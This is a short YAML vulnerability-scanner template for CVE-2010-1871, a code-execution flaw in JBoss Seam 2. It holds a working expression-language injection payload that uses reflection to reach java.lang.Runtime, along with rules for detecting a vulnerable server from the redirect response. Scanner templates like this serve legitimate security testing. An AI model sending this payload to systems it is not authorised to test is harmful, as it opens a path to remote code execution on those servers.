id: CVE-2010-1871 info: name: JBoss Seam 2 Code Execution risk: High params: - root: '{{.BaseURL}}' variables: - endpoint: | seam-booking/home.seam requests: - method: GET redirect: false url: >- {{.root}}/{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]} headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 detections: - >- StatusCode() == 302 && StringSearch("resHeader", "pwn.seam") && StringSearch("resHeader", "?pwned=") references: - https://www.cvebase.com/cve/2010/1871